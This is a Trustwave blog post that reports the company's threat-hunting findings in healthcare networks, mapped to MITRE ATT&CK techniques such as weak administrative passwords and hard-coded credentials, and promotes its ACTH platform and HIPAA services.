Trustwave Threat Hunt Team Uncovers Healthcare Industry Vulnerabilities
The healthcare industry has been struck with a growing number of cyberattacks over the last few months, raising concerns in the healthcare industry and in Washington, D.C. The continued onslaught of attacks has raised the question of how healthcare entities can and should be raising their cyber defenses. One potential tool in a hospital, or any industry's toolbox, can be Trustwave's patent-pending Advanced Continual Threat Hunt (ACTH) platform.
Trustwave SpiderLabs ACTH is uniquely positioned to hunt threats in client networks. The solution's effectiveness is evident based on findings over the last nine months within the healthcare industry that covered thousands of endpoints, during which ACTH found numerous issues related to password management, human error, and flawed custom applications healthcare facilities use.
The Need to Proactively Spot Cyber Issues
All industries need the capability to proactively spot malware and vulnerabilities before they activate and launch an attack, but the threat to healthcare is top of mind to both security professionals and even elected officials who are now raising the alarm.
The U.S. Senate Committee on Homeland Security & Governmental Affairs on March 16 held a hearing entitled, In Need of a Checkup: Examining the Cybersecurity Risks to the Healthcare Sector. Appearing before the committee were cybersecurity representatives from the healthcare field.
"Healthcare is a rapidly growing sector of our economy that employs more than 18 million workers and is made up of both public and private sector organizations related to patient services, medical devices and manufacturers, and electronic health and medical records that store considerable amounts of personal information, making them frequent targets of attacks,” said Committee Chairman Sen. Gary Peters (D-Mich.) in his opening remarks.
What Trustwave’s Human-Led, Behavior-Based Hunts Discovered
The password management issues were related to MITRE ATT&CK labels T1078 Valid Accounts and T1552 Unsecured Credentials.
About 30% of the team's findings are related to T1078. In this category, we have found that administrative accounts with passwords older than one year were the biggest concern. These accounts are one of the first targets threat actors will look to exploit. Leveraging exploits on weak or unmanaged administrative accounts enables threat actors to elevate their user level privileges and move laterally from system to system.
According to MITRE ATT&CK, a large number of threat actors, including APT18, APT28, and Carbanak use this attack. When successful, these groups may obtain and abuse credentials of existing accounts to gain initial access, persistence, privilege escalation, or defense evasion. Additionally, threat actors can use compromised credentials to bypass access controls placed on various resources on systems within the network. Attackers can also use these credentials for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.
Our behavior based hunts reveal that 22% of our findings in healthcare are related to T1552 Unsecured Credentials.
T1552 is where we see custom applications or scripts running with passwords in clear-text or hard-coded in the script itself. MITRE ATT&CK said adversaries using this technique may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g., Bash History), operating system or application-specific repositories (e.g., Credentials in Registry), or other specialized files/artifacts (e.g., Private Keys).
An attacker can also use T1552 in conjunction with T1078. When a threat actor can scrape or 'sniff' the password from these applications, paired with the T1078 Valid Accounts with administrative accounts that don't have good password rotation, this can be an easy one, two-punch for a threat actor to leverage their foothold in the environment.
Providing modern healthcare requires the use of hundreds of devices. Some are extremely critical such as monitors, scanning equipment, and pumps, while others can be as innocuous as a CCTV camera. What all these have in common is they require an application to do their job
In 30% of its findings, the Threat Hunt team found problems related to MITRE ATT&CK T1059 Command and Scripting Interpreter.
MITRE noted that adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities. For example, macOS and Linux distributions include some flavor of Unix Shell, while Windows installations include the Windows Command Shell and PowerShell.
Threat actors may abuse these technologies in various ways to execute arbitrary commands. For example, commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing command and control node. Adversaries may also execute commands through interactive terminals/shells and utilize various Remote Services to achieve remote Execution.
This activity does not come as a surprise, as many custom applications find their way into healthcare environments. It's important to know the applications, custom and commercial, running in the environment because many threat actors will embed their tools in locations that make it allow them to hide in plain sight as they appear to be just another custom app.
Somewhat less frequent were those related to T1204 User execution of Malicious Files. These findings accounted for 12% of the Threat Hunt team's findings.
This technique relies on a user taking a specific action that results in malicious activity being executed, MITRE reports, adding that users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of phishing.
Whether it's adware, potentially unwanted programs (PUP), or malware from a phishing email, end-users are generally the target to bring in the garbage. This activity, getting a user to execute malware, is often the first stage in an attack. Something seemingly trivial like an adware, or browser application, combined with the other techniques, could lend itself to a full-scale ransomware attack.
In one example cited by MITRE, the threat group LAPSUS$ recruited people in the target organization or a contractor who provided credentials and approved an associated multifactor authentication prompt. This person may also have installed remote management software onto a corporate workstation that allowed LAPSUS$ to take control of an authenticated system.
The Trustwave Advantage
Trustwave SpiderLabs is uniquely positioned to hunt threats in client networks using the Threat Hunt team's recently revamped and relaunched ACTH platform. ACTH is a proactive Tactics, Techniques and Procedures-(TTPs) focused threat-hunting platform and methodology based on the MITRE ATT&CK framework resulting in a 3x increase in behavior-based threat findings.
The solution allows the elite SpiderLabs Threat Hunting team to conduct more higher-quality, human-led threat hunts per year to find indicators of behavior across Trustwave's global client base and multiple Endpoint Detection and Response (EDR) tools. In addition, ACTH supports various Endpoint Detection and Response tools which gives Trustwave access to more queries that can be used to find threats.
Trustwave ACTH provides:
- Identification of behaviors that are opportunities of compromise in 100% of hunts that we perform
- Discovery of adversaries that evade initial detection by security technologies
- Discovery of new Indicators of Compromise
- Discovery of open risks that attackers exploit
- Best practice risk mitigation recommendations
- Better outcomes for protection and detection capabilities across all Trustwave clients as threat intelligence is enriched with new threat hunt findings
- Report findings and incident tickets in the Trustwave Fusion platform
ACTH supports the most popular tools available, such as Microsoft Defender for Endpoints, Palo Alto Networks Cortex XDR, SentinelOne, VMware Hosted EDR (Carbon Black Response), and VMware Enterprise EDR (Carbon Black Threat Hunter) and Cybereason.
Trustwave’s Cybersecurity Prescription for Healthcare
Trustwave has a plan in place when it comes to protecting healthcare clients. This plan centers on controlling risks and meeting compliance demands.
These tasks are accomplished by Trustwave’s ability to assess and respond to the risks brought on by data, cloud, mobility and business partners, and we help you with HIPAA compliance. This task is accomplished with Trustwave’s HIPAA Compliance Pre-Assessment and HIPAA Compliance Readiness Service.
During the pre-assessment consultants will evaluate your organization’s existing HIPAA compliance through documentation and business process reviews to identify critical and high-risk findings. Your compliance program will be evaluated against all aspects of the HIPAA Omnibus standards.
The readiness service will evaluate your existing compliance posture in reference to the HIPAA standards in a different fashion by conducting interviews and a documentation review. These are then evaluated against all aspects of the HIPAA standard.
CASE STUDY
Incident Preparedness Case Study in Healthcare
The complexity of today’s cyber threat landscape requires organizations to not only protect their cyber security controls, but to also be sufficiently prepared to handle a security breach. In the case of healthcare providers, an increasingly acute concern is an ineffective incident response coupled with the potential loss of sensitive data, quality of service, and patient trust. Trustwave utilizes its significant experience in breach response to design a custom Tabletop Exercise for a health services provider looking to be better prepared.
About the Author
Shawn Kanady is Senior Director, SpiderLabs Hunt and Intelligence at Trustwave with over 20 years of experience in IT and security. He leads the team by example, applying his DFIR knowledge to create industry best practices. Follow Shawn on LinkedIn.
ABOUT TRUSTWAVE
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.